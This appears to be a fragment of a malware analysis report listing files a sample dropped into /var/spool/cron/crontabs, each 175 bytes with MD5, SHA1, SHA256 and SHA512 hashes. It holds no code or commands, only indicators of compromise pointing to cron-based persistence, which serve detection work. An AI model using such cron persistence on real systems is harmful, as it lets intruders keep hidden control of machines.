                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            ae3cc7cd4675a839918b675f635709f300fc5685

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            36cb246b517544eae14c6e160be7b54e5c4446b8f334d47d1371cd5f9b297dea

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3df91953f5b56f4dd6919f8c112c98e6852ae6960a1ed8dc9dc6d9a50e4de848d05da7a43c8d395b0c632119d66ad41474aa20183e64adba8cc5e5df8e6d8c54

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /var/spool/cron/crontabs/tmp.v3WrHB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            175B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5e3e9c99fc365b65ec9d6e8a942c5995

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            ae3cc7cd4675a839918b675f635709f300fc5685

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            36cb246b517544eae14c6e160be7b54e5c4446b8f334d47d1371cd5f9b297dea

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3df91953f5b56f4dd6919f8c112c98e6852ae6960a1ed8dc9dc6d9a50e4de848d05da7a43c8d395b0c632119d66ad41474aa20183e64adba8cc5e5df8e6d8c54

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /var/spool/cron/crontabs/tmp.wMIKTv

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            175B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5e3e9c99fc365b65ec9d6e8a942c5995

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            ae3cc7cd4675a839918b675f635709f300fc5685

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            36cb246b517544eae14c6e160be7b54e5c4446b8f334d47d1371cd5f9b297dea

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3df91953f5b56f4dd6919f8c112c98e6852ae6960a1ed8dc9dc6d9a50e4de848d05da7a43c8d395b0c632119d66ad41474aa20183e64adba8cc5e5df8e6d8c54